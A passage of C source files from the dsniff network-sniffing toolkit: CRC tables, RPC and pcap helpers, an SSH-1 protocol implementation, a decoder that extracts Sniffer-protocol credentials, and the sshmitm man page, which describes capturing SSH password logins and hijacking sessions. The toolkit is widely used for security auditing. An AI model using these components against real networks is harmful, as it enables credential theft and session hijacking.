0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d }; /* * Update a running CRC with the bytes * buf[0..len-1]--the CRC should be * initialized to all 1's. */ uint32_t crc32_update(const void *buf, size_t len, uint32_t crc) { const uint8_t *b = buf; size_t i; for (i = 0; i < len; i++) { crc = CRC32_Table[(crc ^ *b++) & 0xff] ^ (crc >> 8); } return ~crc; } /* * Return the CRC of the bytes buf[0..len-1]. */ uint32_t crc32(const void *buf, size_t len) { return crc32_update(buf, len, CRC32_INITIAL); } hackerschoice-dsniff-a17510d/rpc.c0000664000175000017500000000444315105626144016747 0ustar epsilonepsilon/* * rpc.c * * Copyright (c) 2000 Dug Song * * $Id: rpc.c,v 1.8 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "decode.h" #include "rpc.h" #define XIDMAPSIZE 64 static struct xid_map xid_maps[XIDMAPSIZE]; static int xid_map_next = 0; static int xid_map_hint = 0; /* xid_map adapted from tcpdump's print-nfs.c */ void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, u_int32_t proc, void *data) { struct xid_map *mp; mp = &xid_maps[xid_map_next]; if (++xid_map_next >= XIDMAPSIZE) xid_map_next = 0; mp->xid = xid; mp->prog = prog; mp->vers = vers; mp->proc = proc; mp->data = data; } struct xid_map * xid_map_find(int xid) { struct xid_map *mp; int i; /* Start searching from where we last left off. */ i = xid_map_hint; do { mp = &xid_maps[i]; if (mp->xid == xid) { /* match */ xid_map_hint = i; return (mp); } if (++i >= XIDMAPSIZE) i = 0; } while (i != xid_map_hint); return (NULL); } int rpc_decode(u_char *buf, int len, struct rpc_msg *msg) { XDR xdrs; u_int32_t fraghdr; u_char *p, *tmp; int stat, tmplen; if (len < 20) return (0); p = buf + 4; /* If not recognizably RPC, try TCP record defragmentation */ if (pntohl(p) != CALL && pntohl(p) != REPLY) { tmp = buf; tmplen = 0; for (;;) { fraghdr = pntohl(tmp); if (FRAGLEN(fraghdr) + 4 > len) return (0); len -= 4; memmove(tmp, tmp + 4, len); tmplen += FRAGLEN(fraghdr); if (LASTFRAG(fraghdr)) break; tmp += FRAGLEN(fraghdr); len -= FRAGLEN(fraghdr); if (len < 4) return (0); } len = tmplen; } /* Decode RPC message. */ memset(msg, 0, sizeof(*msg)); if (ntohl(((struct rpc_msg *)buf)->rm_direction) == CALL) { xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (!xdr_callmsg(&xdrs, msg)) { xdr_destroy(&xdrs); return (0); } } else if (ntohl(((struct rpc_msg *)buf)->rm_direction) == REPLY) { msg->acpted_rply.ar_results.proc = (xdrproc_t) xdr_void; xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (!xdr_replymsg(&xdrs, msg)) { xdr_destroy(&xdrs); return (0); } } else return (0); stat = xdr_getpos(&xdrs); xdr_destroy(&xdrs); return (stat); } hackerschoice-dsniff-a17510d/LICENSE0000664000175000017500000000267215105626144017026 0ustar epsilonepsilon Copyright (c) 1999, 2000 Dug Song All rights reserved, all wrongs reversed. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. hackerschoice-dsniff-a17510d/crc32.h0000664000175000017500000000051515105626144017100 0ustar epsilonepsilon #ifndef __DS_CRC32_H__ #define __DS_CRC32_H__ 1 #define CRC32_INITIAL ((uint32_t)0xffffffff) #define CRC32_INITIAL_STATE (~CRC32_INITIAL) #include #include uint32_t crc32_update(const void *buf, size_t len, uint32_t crc); uint32_t crc32(const void *buf, size_t len); #endif /* __DS_CRC32_H__ */ hackerschoice-dsniff-a17510d/pcaputil.h0000664000175000017500000000054715105626144020012 0ustar epsilonepsilon/* * pcaputil.h * * pcap utility routines. * * Copyright (c) 2000 Dug Song * * $Id: pcaputil.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef PCAPUTIL_H #define PCAPUTIL_H pcap_t *pcap_init_dsniff(char *intf, char *filter, int snaplen); int pcap_dloff(pcap_t *pd); char *copy_argv(char **argv); #endif /* PCAPUTIL_H */ hackerschoice-dsniff-a17510d/ssh.c0000664000175000017500000003373615105626144016767 0ustar epsilonepsilon/* * ssh.c * * Minimal SSH-1 protocol implementation. * * Copyright (c) 2000 Dug Song * * $Id: ssh.c,v 1.6 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "hex.h" #include "options.h" #include "sshcrypto.h" #include "ssh.h" static u_int crc32_tab[] = { 0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L, 0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L, 0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L, 0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL, 0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L, 0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L, 0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L, 0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL, 0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L, 0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL, 0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L, 0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L, 0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L, 0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL, 0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL, 0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L, 0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL, 0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L, 0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L, 0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L, 0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL, 0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L, 0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L, 0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL, 0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L, 0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L, 0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L, 0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L, 0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L, 0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL, 0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL, 0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L, 0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L, 0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL, 0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL, 0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L, 0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL, 0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L, 0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL, 0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L, 0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL, 0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L, 0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L, 0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL, 0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L, 0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L, 0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L, 0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L, 0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L, 0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L, 0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL, 0x2d02ef8dL }; static u_char pkt[4 + 8 + SSH_MAX_PKTLEN]; static void put_bn(BIGNUM *bn, u_char **pp) { short i; i = BN_num_bits(bn); PUTSHORT(i, *pp); *pp += BN_bn2bin(bn, *pp); } static void get_bn(BIGNUM *bn, u_char **pp, int *lenp) { short i; if (*lenp < 2) { errx(1, "short buffer"); } GETSHORT(i, *pp); *lenp -= 2; i = ((i + 7) / 8); if (*lenp < i) { errx(1, "short buffer"); } BN_bin2bn(*pp, i, bn); *pp += i; *lenp -= i; } static u_char * ssh_session_id(u_char *cookie, BIGNUM *hostkey_n, BIGNUM *servkey_n) { static u_char sessid[16]; u_int i, j; u_char *p; i = BN_num_bytes(hostkey_n); j = BN_num_bytes(servkey_n); if ((p = malloc(i + j + 8)) == NULL) return (NULL); /* XXX - conform to sshd implementation here, not RFC. */ BN_bn2bin(hostkey_n, p); BN_bn2bin(servkey_n, p + i); memcpy(p + i + j, cookie, 8); MD5(p, i + j + 8, sessid); free(p); return (sessid); } static u_int ssh_crc32(const unsigned char *p, u_int len) { u_int i; u_int val; val = 0; for (i = 0; i < len; i ++) { val = crc32_tab[(val ^ p[i]) & 0xff] ^ (val >> 8); } return (val); } static ssize_t atomicio(ssize_t (*f)(), int fd, void *_s, size_t n) { char *s = _s; ssize_t res, pos = 0; while (n > pos) { res = (f) (fd, s + pos, n - pos); switch (res) { case -1: if (errno == EINTR || errno == EAGAIN) continue; case 0: return (res); default: pos += res; } } return (pos); } void SSH_init(void) { SSL_library_init(); SSL_load_error_strings(); ERR_load_crypto_strings(); #ifndef BSD if (!RAND_status()) { RAND_seed("if you had a real operating system, " "you'd have a real kernel PRNG", 65); } #endif } SSH_CTX * SSH_CTX_new(void) { SSH_CTX *ctx; if ((ctx = calloc(sizeof(*ctx), 1)) == NULL) return (NULL); ctx->authmask = (1 << SSH_AUTH_PASSWORD); ctx->encmask = ((1 << SSH_CIPHER_3DES) | (1 << SSH_CIPHER_BLOWFISH) | (1 << SSH_CIPHER_NONE)); return (ctx); } SSH * SSH_new(SSH_CTX *ctx) { SSH *ssh; if ((ssh = calloc(sizeof(*ssh), 1)) == NULL) return (NULL); ssh->fd = -1; ssh->ctx = ctx; return (ssh); } void SSH_set_fd(SSH *ssh, int fd) { ssh->fd = fd; } #define SKIP(p, i, l) { (p) += (l); if (((i) -= (l)) < 0) return (-1); } int SSH_accept(SSH *ssh) { BIGNUM *enckey; u_char *p, cipher, cookie[8], msg[1024]; u_int32_t num; int i; const BIGNUM *servkey_e, *servkey_n; const BIGNUM *hostkey_e, *hostkey_n; /* Generate anti-spoofing cookie. */ RAND_bytes(cookie, sizeof(cookie)); /* Send public key. */ p = msg; *p++ = SSH_SMSG_PUBLIC_KEY; /* type */ memcpy(p, cookie, 8); p += 8; /* cookie */ num = 768; PUTLONG(num, p); /* servkey bits */ RSA_get0_key(ssh->ctx->servkey, &servkey_n, &servkey_e, NULL); put_bn(servkey_e, &p); /* servkey exponent */ put_bn(servkey_n, &p); /* servkey modulus */ num = 1024; PUTLONG(num, p); /* hostkey bits */ RSA_get0_key(ssh->ctx->hostkey, &hostkey_n, &hostkey_e, NULL); put_bn(hostkey_e, &p); /* hostkey exponent */ put_bn(hostkey_n, &p); /* hostkey modulus */ num = 0; PUTLONG(num, p); /* protocol flags */ num = ssh->ctx->encmask; PUTLONG(num, p); /* ciphers */ num = ssh->ctx->authmask; PUTLONG(num, p); /* authmask */ if (SSH_send(ssh, msg, p - msg) < 0) { warn("SSH_send"); return (-1); } /* Receive session key. */ if ((i = SSH_recv(ssh, pkt, sizeof(pkt))) <= 0) { warn("SSH_recv"); return (-1); } p = pkt; /* Verify type. */ if (p[0] != SSH_CMSG_SESSION_KEY) { warnx("expected packet type %d, got %d", SSH_CMSG_SESSION_KEY, pkt[0]); return (-1); } SKIP(p, i, 1); /* Verify cipher. */ cipher = p[0]; if (cipher != SSH_CIPHER_NONE && (ssh->ctx->encmask & (1 << cipher)) == 0) { warnx("cipher type %d not supported", cipher); return (-1); } SKIP(p, i, 1); /* Verify cookie. */ if (memcmp(p, cookie, 8) != 0) { warnx("cookie doesn't match"); return (-1); } SKIP(p, i, 8); /* Get encrypted session key. */ if ((enckey = BN_new()) == NULL) { warn("BN_new"); return (-1); } get_bn(enckey, &p, &i); /* Skip protocol flags. */ SKIP(p, i, 4); /* Decrypt session key. */ if (BN_cmp(servkey_n, hostkey_n) > 0) { rsa_private_decrypt(enckey, enckey, ssh->ctx->servkey); rsa_private_decrypt(enckey, enckey, ssh->ctx->hostkey); } else { rsa_private_decrypt(enckey, enckey, ssh->ctx->hostkey); rsa_private_decrypt(enckey, enckey, ssh->ctx->servkey); } BN_mask_bits(enckey, sizeof(ssh->sesskey) * 8); i = BN_num_bytes(enckey); if (i < 0 || i > sizeof(ssh->sesskey)) { warnx("session key bogus"); return (-1); } memset(ssh->sesskey, 0, sizeof(ssh->sesskey)); BN_bn2bin(enckey, ssh->sesskey + sizeof(ssh->sesskey) - i); BN_clear_free(enckey); /* Derive real session key using session id. */ if ((p = ssh_session_id(cookie, hostkey_n, servkey_n)) == NULL) { warn("ssh_session_id"); return (-1); } for (i = 0; i < 16; i++) { ssh->sesskey[i] ^= p[i]; } /* Set cipher. */ if (cipher == SSH_CIPHER_3DES) { warnx("cipher 3des no longer supported"); return (-1); } else if (cipher == SSH_CIPHER_BLOWFISH) { ssh->estate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->dstate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->encrypt = blowfish_encrypt; ssh->decrypt = blowfish_decrypt; } /* Send verification. */ msg[0] = SSH_SMSG_SUCCESS; if (SSH_send(ssh, msg, 1) == -1) { warn("SSH_send"); return (-1); } return (0); } int SSH_connect(SSH *ssh) { BIGNUM *bn; u_char *p, cipher, cookie[8], msg[1024]; u_int32_t num; int i; BIGNUM *servkey_n, *servkey_e; BIGNUM *hostkey_n, *hostkey_e; /* Get public key. */ if ((i = SSH_recv(ssh, pkt, sizeof(pkt))) <= 0) { warn("SSH_recv"); return (-1); } p = pkt; /* Verify type. */ if (p[0] != SSH_SMSG_PUBLIC_KEY) { warnx("expected packet type %d, got %d", SSH_SMSG_PUBLIC_KEY, p[0]); return (-1); } SKIP(p, i, 1); /* Get cookie. */ if (i > 8) memcpy(cookie, p, 8); SKIP(p, i, 8); /* Get servkey. */ ssh->ctx->servkey = RSA_new(); servkey_n = BN_new(); servkey_e = BN_new(); RSA_set0_key(ssh->ctx->servkey, servkey_n, servkey_e, NULL); SKIP(p, i, 4); get_bn(servkey_e, &p, &i); get_bn(servkey_n, &p, &i); /* Get hostkey. */ ssh->ctx->hostkey = RSA_new(); hostkey_n = BN_new(); hostkey_e = BN_new(); RSA_set0_key(ssh->ctx->hostkey, hostkey_n, hostkey_e, NULL); SKIP(p, i, 4); get_bn(hostkey_e, &p, &i); get_bn(hostkey_n, &p, &i); /* Get cipher, auth masks. */ SKIP(p, i, 4); if (i < 8) return (-1); GETLONG(ssh->ctx->encmask, p); GETLONG(ssh->ctx->authmask, p); /* Generate session key. */ RAND_bytes(ssh->sesskey, sizeof(ssh->sesskey)); /* Obfuscate with session id. */ if ((p = ssh_session_id(cookie, hostkey_n, servkey_n)) == NULL) { warn("ssh_session_id"); return (-1); } if ((bn = BN_new()) == NULL) { warn("BN_new"); return (-1); } BN_set_word(bn, 0); for (i = 0; i < sizeof(ssh->sesskey); i++) { BN_lshift(bn, bn, 8); if (i < 16) BN_add_word(bn, ssh->sesskey[i] ^ p[i]); else BN_add_word(bn, ssh->sesskey[i]); } /* Encrypt session key. */ if (BN_cmp(servkey_n, hostkey_n) < 0) { rsa_public_encrypt(bn, bn, ssh->ctx->servkey); rsa_public_encrypt(bn, bn, ssh->ctx->hostkey); } else { rsa_public_encrypt(bn, bn, ssh->ctx->hostkey); rsa_public_encrypt(bn, bn, ssh->ctx->servkey); } RSA_free(ssh->ctx->servkey); RSA_free(ssh->ctx->hostkey); /* Verify auth and cipher type. */ if ((ssh->ctx->authmask & (1 << SSH_AUTH_PASSWORD)) == 0) { warnx("password auth not supported!"); return (-1); } if ((ssh->ctx->encmask & (1 << SSH_CIPHER_BLOWFISH))) { cipher = SSH_CIPHER_BLOWFISH; } else if ((ssh->ctx->encmask & (1 << SSH_CIPHER_3DES))) { cipher = SSH_CIPHER_3DES; } else { warnx("no supported cipher"); return (-1); } /* Send SSH_CMSG_SESSION_KEY. */ p = msg; *p++ = SSH_CMSG_SESSION_KEY; /* type */ *p++ = cipher; /* cipher type */ memcpy(p, cookie, 8); p += 8; /* cookie */ put_bn(bn, &p); /* enc sesskey */ num = 0; PUTLONG(num, p); /* flags */ BN_clear_free(bn); if (SSH_send(ssh, msg, p - msg) < 0) { warn("SSH_send"); return (-1); } /* Set cipher. */ if (cipher == SSH_CIPHER_BLOWFISH) { ssh->estate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->dstate = blowfish_init(ssh->sesskey,sizeof(ssh->sesskey)); ssh->encrypt = blowfish_encrypt; ssh->decrypt = blowfish_decrypt; } else if (cipher == SSH_CIPHER_3DES) { warnx("cipher 3des no longer supported"); return (-1); } /* Get server response. */ if ((i = SSH_recv(ssh, pkt, sizeof(pkt))) <= 0) { warn("SSH_recv"); return (-1); } if (i < 1 || pkt[0] != SSH_SMSG_SUCCESS) { warnx("server rejected us"); return (-1); } return (0); } int SSH_recv(SSH *ssh, u_char *buf, int size) { u_int32_t i, crc, len; u_char *p; /* Read length. */ if (atomicio(read, ssh->fd, &len, sizeof(len)) != sizeof(len)) { return (-1); } len = ntohl(len); i = 8 - (len % 8); if (i + len > size) { errno = EINVAL; return (-1); } /* Read padding + data + crc. */ if (atomicio(read, ssh->fd, buf, i + len) != i + len) return (-1); /* Decrypt payload. */ if (ssh->decrypt != NULL) { ssh->decrypt(buf, buf, i + len, ssh->dstate); } /* Verify CRC. */ len -= 4; p = buf + i + len; GETLONG(crc, p); if (ssh_crc32(buf, i + len) != crc) { warnx("check bytes corrupted on input"); errno = EINVAL; return (-1); } /* Skip padding. */ memmove(buf, buf + i, len); if (Opt_debug) { hex_print(buf, len, 0); } return (len); } int SSH_send(SSH *ssh, u_char *buf, int len) { u_char *p; u_int32_t i; if (len > SSH_MAX_PKTLEN) { errno = EMSGSIZE; return (-1); } p = pkt; /* Add length (msg + crc). */ i = len + 4; PUTLONG(i, p); /* Add padding. */ i = 8 - ((len + 4) % 8); if (ssh->encrypt != NULL) { RAND_bytes(p, i); } else memset(p, 0, i); p += i; /* Add data. */ memmove(p, buf, len); p += len; /* Add CRC. */ i = ssh_crc32(pkt + 4, (p - pkt) - 4); PUTLONG(i, p); i = p - pkt; /* Encrypt payload. */ if (ssh->encrypt != NULL) { ssh->encrypt(pkt + 4, pkt + 4, i - 4, ssh->estate); } /* Send it. */ if (atomicio(write, ssh->fd, pkt, i) != i) return (-1); return (len); } void SSH_close(SSH *ssh) { close(ssh->fd); } hackerschoice-dsniff-a17510d/sshmitm.80000664000175000017500000000147115105626144017572 0ustar epsilonepsilon.TH SSHMITM 8 .ad .fi .SH NAME sshmitm \- SSH monkey-in-the-middle .SH SYNOPSIS .na .nf .fi \fBsshmitm\fR [\fB-d\fR] [\fB-I\fR] [\fB-p \fIport\fR] host [\fIport\fR] .SH DESCRIPTION .ad .fi \fBsshmitm\fR proxies and sniffs SSH traffic redirected by dnsspoof(8), capturing SSH password logins, and optionally hijacking interactive sessions. Only SSH protocol version 1 is (or ever will be) supported - this program is far too evil already. .SH OPTIONS .IP \fB-d\fR Enable verbose debugging output. .IP \fB-I\fR Monitor / hijack an interactive session. .IP "\fB-p \fIport\fR" Specify the local port to listen on. .IP \fIhost\fR Specify the remote host to relay connections to. .IP \fIport\fR Specify the remote port to relay connections to. .SH "SEE ALSO" dsniff(8), dnsspoof(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/debian/0000775000175000017500000000000015105626144017234 5ustar epsilonepsilonhackerschoice-dsniff-a17510d/pcaputil.c0000664000175000017500000000423315105626144020001 0ustar epsilonepsilon/* * pcaputil.c * * Copyright (c) 2000 Dug Song * * $Id: pcaputil.c,v 1.2 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #if defined(BSD) && !defined(__FreeBSD__) # define WITH_BPF 1 #endif #include #include #include #include #include #ifdef WITH_BPF # include #endif #include "pcaputil.h" #ifdef WITH_BPF static int bpf_immediate(int fd, int on) { return (ioctl(fd, BIOCIMMEDIATE, &on)); } #endif int pcap_dloff(pcap_t *pd) { int offset = -1; switch (pcap_datalink(pd)) { case DLT_EN10MB: offset = 14; break; case DLT_IEEE802: offset = 22; break; case DLT_FDDI: offset = 21; break; #ifdef DLT_LOOP case DLT_LOOP: #endif case DLT_NULL: offset = 4; break; case DLT_LINUX_SLL: /* e.g. ppp */ offset = 16; break; default: warnx("unsupported datalink type"); break; } return (offset); } pcap_t * pcap_init_dsniff(char *intf, char *filter, int snaplen) { pcap_t *pd; u_int net, mask; struct bpf_program fcode; char ebuf[PCAP_ERRBUF_SIZE]; if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) { warnx("%s", ebuf); return (NULL); } if ((pd = pcap_open_live(intf, snaplen, 1, 512, ebuf)) == NULL) { warnx("%s", ebuf); return (NULL); } if (pcap_lookupnet(intf, &net, &mask, ebuf) == -1) { warnx("%s", ebuf); return (NULL); } if (pcap_compile(pd, &fcode, filter, 1, mask) < 0) { pcap_perror(pd, "pcap_compile"); return (NULL); } if (pcap_setfilter(pd, &fcode) == -1) { pcap_perror(pd, "pcap_compile"); return (NULL); } #ifdef WITH_BPF if (bpf_immediate(pd->fd, 1) < 0) { perror("ioctl"); return (NULL); } #endif return (pd); } /* from tcpdump util.c. */ char * copy_argv(char **argv) { char **p, *buf, *src, *dst; u_int len = 0; p = argv; if (*p == 0) return (0); while (*p) len += strlen(*p++) + 1; if ((buf = (char *)malloc(len)) == NULL) err(1, "copy_argv: malloc"); p = argv; dst = buf; while ((src = *p++) != NULL) { while ((*dst++ = *src++) != '\0') ; dst[-1] = ' '; } dst[-1] = '\0'; return (buf); } hackerschoice-dsniff-a17510d/rpc.h0000664000175000017500000000112315105626144016744 0ustar epsilonepsilon/* * rpc.h * * RPC utility routines. * * Copyright (c) 2000 Dug Song * * $Id: rpc.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef RPC_H #define RPC_H #define FRAGLEN(x) (x & 0x7fffffff) #define LASTFRAG(x) (x & (1 << 31)) struct xid_map { u_int32_t xid; u_int32_t prog; u_int32_t vers; u_int32_t proc; void *data; }; int rpc_decode(u_char *buf, int len, struct rpc_msg *msg); void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, u_int32_t proc, void *data); struct xid_map *xid_map_find(int xid); #endif /* RPC_H */ hackerschoice-dsniff-a17510d/decode_sniffer.c0000664000175000017500000000177715105626144021131 0ustar epsilonepsilon/* * decode_sniffer.c * * Network Associates Sniffer. * * Copyright (c) 2000 Anonymous * Copyright (c) 2000 Dug Song * * $Id: decode_sniffer.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "base64.h" #include "decode.h" int decode_sniffer(u_char *buf, int len, u_char *obuf, int olen) { u_int i, opcode; if (len < 36 || buf[0] != 5) return (0); opcode = pletohs(&buf[6]); if (opcode == 260) { if (buf[32] == 0) return (strlcpy(obuf, "[]\n", olen)); } else if (opcode == 261) { if (pletohl(&buf[32]) == -1) return (strlcpy(obuf, "[]\n", olen)); } else return (0); buf[len - 3]= '\0'; strtok(&buf[32], "\r\n"); snprintf(obuf, olen, "%s [", &buf[32]); len = strlen(obuf); i = base64_pton(&buf[32], &obuf[len], olen - len - 3); obuf[len + i] = '\0'; strlcat(obuf, "]\n", olen); return (strlen(obuf)); 